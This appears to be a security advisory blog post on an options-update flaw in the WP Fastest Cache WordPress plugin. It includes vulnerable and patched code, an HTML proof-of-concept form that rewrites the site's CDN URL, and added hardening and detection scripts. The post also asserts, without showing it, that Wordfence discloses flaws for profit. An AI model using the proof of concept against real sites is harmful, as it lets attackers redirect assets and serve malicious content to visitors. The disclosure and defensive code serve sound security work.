25 May

Protecting You Against Wordfence’s Bad Practices: Unauthorized Options Update Vulnerability in WP Fastest Cache

Wordfence is putting WordPress websites at risk by disclosing vulnerabilities in plugins while leaving out the critical details needed to double-check its work, in what appears to be an attempt to profit from these vulnerabilities. We are releasing those details so that others can review the vulnerabilities and try to limit the damage Wordfence's practice could cause.

Wordfence describes the vulnerability in WP Fastest Cache version 0.8.5.7 as “The Options Update vulnerability allows an attacker to access and make changes to the CDN (Content Delivery Network) options for the website. With this control an attacker can direct all requests for css files, images, videos, etc. to their site, allowing them to serve malicious content to visitors of the vulnerable site.”

The relevant change in the next version, 0.8.5.8, was to restrict the AJAX-accessible function wpfc_save_cdn_integration_ajax_request_callback() in the file /wpFastestCache.php to users with the manage_options capability, which by default means Administrators.

Code in 0.8.5.7:

public function wpfc_save_cdn_integration_ajax_request_callback(){
	// No capability check: any logged-in user whose request reaches this
	// AJAX callback can overwrite the CDN settings.
	$values = json_encode($_POST["values"]);
	if(get_option("WpFastestCacheCDN")){
		update_option("WpFastestCacheCDN", $values);
	}else{
		add_option("WpFastestCacheCDN", $values, null, "yes");
	}
	echo json_encode(array("success" => true));
	exit;
}

Code in 0.8.5.8:

public function wpfc_save_cdn_integration_ajax_request_callback(){
	// The fix: only users with the manage_options capability may proceed.
	if(current_user_can('manage_options')){
		$values = json_encode($_POST["values"]);
		if(get_option("WpFastestCacheCDN")){
			update_option("WpFastestCacheCDN", $values);
		}else{
			add_option("WpFastestCacheCDN", $values, null, "yes");
		}
		echo json_encode(array("success" => true));
		exit;
	}else{
		wp_die("Must be admin");
	}
}

Wordfence's description notably doesn't mention that the attacker needs to be logged in to WordPress to exploit this, which substantially lowers the severity of the vulnerability.
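As an added example, not code from this post or from the WP Fastest Cache plugin, here is a hardened form of the handler that a plugin author could write. It goes beyond the 0.8.5.8 fix in two ways a reviewer would ask for: it verifies a nonce with check_ajax_referer() in addition to the capability (the 0.8.5.8 excerpt above shows no nonce check; whether the plugin verifies one elsewhere is not shown on this page), and it stores only the expected fields after sanitizing them rather than json_encode()'ing the raw $_POST array. The nonce action name wpfc_cdn_nonce and the function name wpfc_hardened_save_cdn() are assumptions; the option name and the AJAX action name are taken from the page.

```php
<?php
// Added example, not WP Fastest Cache's code: a hardened replacement for the
// wpfc_save_cdn_integration_ajax_request_callback() handler shown above.
// The option name and AJAX action name come from the page; the nonce action
// name 'wpfc_cdn_nonce' and the function name are assumptions.

function wpfc_hardened_save_cdn() {
	// 1. Capability check, as in the 0.8.5.8 fix: only users who may manage
	//    options (Administrators) can change where assets are served from.
	if (!current_user_can('manage_options')) {
		wp_send_json_error(array('message' => 'Must be admin'), 403);
	}

	// 2. Nonce check: the request must carry a token minted for this action
	//    in the admin's own session, so a page on another site cannot make a
	//    logged-in admin's browser submit the change. On failure
	//    check_ajax_referer() ends the request with -1.
	check_ajax_referer('wpfc_cdn_nonce', 'nonce');

	// 3. Store only the fields the feature uses, each sanitized, instead of
	//    json_encode()'ing whatever arrived in $_POST['values'].
	$raw = (isset($_POST['values']) && is_array($_POST['values']))
		? wp_unslash($_POST['values'])
		: array();

	$allowed_types = array('css', 'js', 'gif', 'png', 'jpg', 'jpeg', 'ttf', 'otf',
	                       'woff', 'less', 'mp4', 'svg', 'eot');
	$file_types = array();
	$requested  = isset($raw['file_types'])
		? explode(',', sanitize_text_field($raw['file_types']))
		: array();
	foreach ($requested as $type) {
		$type = strtolower(trim($type));
		if (in_array($type, $allowed_types, true)) {
			$file_types[] = $type;
		}
	}

	$values = array(
		'id'         => isset($raw['id']) ? sanitize_key($raw['id']) : 'other',
		// esc_url_raw() keeps only http(s) URLs and prepends "http://" to a
		// bare host such as "example.com"; anything else becomes "".
		'cdnurl'     => isset($raw['cdnurl']) ? esc_url_raw($raw['cdnurl']) : '',
		'originurl'  => isset($raw['originurl']) ? esc_url_raw($raw['originurl']) : '',
		'file_types' => implode(',', $file_types),
	);

	if ($values['cdnurl'] === '') {
		wp_send_json_error(array('message' => 'Invalid CDN URL'), 400);
	}

	// update_option() creates the option when it is absent, so the
	// get_option()/add_option() branch of the original is not needed.
	update_option('WpFastestCacheCDN', wp_json_encode($values));
	wp_send_json_success($values);
}

// Registered for logged-in users only: with no wp_ajax_nopriv_ hook,
// admin-ajax.php answers an anonymous request with its default "0".
add_action('wp_ajax_wpfc_save_cdn_integration_ajax_request', 'wpfc_hardened_save_cdn');
```

The settings page that submits this request would embed the token with wp_nonce_field('wpfc_cdn_nonce', 'nonce') or pass wp_create_nonce('wpfc_cdn_nonce') in the POST body. With this handler in place, a form like the proof of concept below fails the nonce check even when it is submitted from a logged-in administrator's browser.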

Proof of Concept

The following proof of concept sets the CDN URL to example.com.

Make sure you are logged in to WordPress, ideally as a Subscriber, since that role has the fewest capabilities. Also make sure to replace "[path to WordPress]" with the location of WordPress.

<html>
 <body>
  <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
   <input type="hidden" name="action" value="wpfc_save_cdn_integration_ajax_request" />
   <input type="hidden" name="values[success]" value="false" />
   <input type="hidden" name="values[id]" value="other" />
   <input type="hidden" name="values[cdnurl]" value="example.com" />
   <input type="hidden" name="values[originurl]" value="" />
   <input type="hidden" name="values[file_types]" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" />
   <input type="hidden" name="file_types" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" />
   <input type="submit" value="Submit" />
  </form>
 </body>
</html>
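For site owners who ran 0.8.5.7 and want to know whether the CDN settings were changed, here is an added WP-CLI script, not part of this post or of the plugin, that reads the stored WpFastestCacheCDN option (which the handler above writes as a JSON encoding of the posted values) and flags a CDN host that is not on an allowlist. The allowlist $expected_hosts, the file name check-wpfc-cdn.php and the helper name wpfc_cdn_host() are assumptions.

```php
<?php
// Added example (not the post's or the plugin's code): run from the site root
// with `wp eval-file check-wpfc-cdn.php`. $expected_hosts is an assumed,
// site-specific list of the CDN hosts that are legitimately configured.
$expected_hosts = array('cdn.example.net');

// Extract the host from a stored cdnurl value. The plugin stores whatever was
// posted, so a bare host without a scheme (the PoC posts "example.com") has
// to be given one before wp_parse_url() will return a host.
function wpfc_cdn_host($url) {
	$url = trim((string) $url);
	if ($url === '') {
		return '';
	}
	if (!preg_match('#^[a-z][a-z0-9+.-]*://#i', $url)) {
		$url = 'http://' . $url;
	}
	$host = wp_parse_url($url, PHP_URL_HOST);
	return is_string($host) ? strtolower($host) : '';
}

$raw = get_option('WpFastestCacheCDN');
if ($raw === false) {
	WP_CLI::success('No CDN integration configured.');
	return;
}

$cdn = json_decode($raw, true);
if (!is_array($cdn)) {
	WP_CLI::warning('WpFastestCacheCDN is not valid JSON: ' . $raw);
	return;
}

$host = wpfc_cdn_host(isset($cdn['cdnurl']) ? $cdn['cdnurl'] : '');
if ($host === '' || !in_array($host, $expected_hosts, true)) {
	WP_CLI::warning(sprintf('Unexpected CDN host "%s" (raw option: %s)', $host, $raw));
	WP_CLI::line('Review the assets being served from this host; the option can be cleared with: wp option delete WpFastestCacheCDN');
} else {
	WP_CLI::success('CDN host ' . $host . ' is on the allowlist.');
}
```

The same option can be inspected by hand with `wp option get WpFastestCacheCDN`; the script only adds the allowlist comparison and the scheme normalisation so that a value like the PoC's "example.com" is compared by host rather than by raw string.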
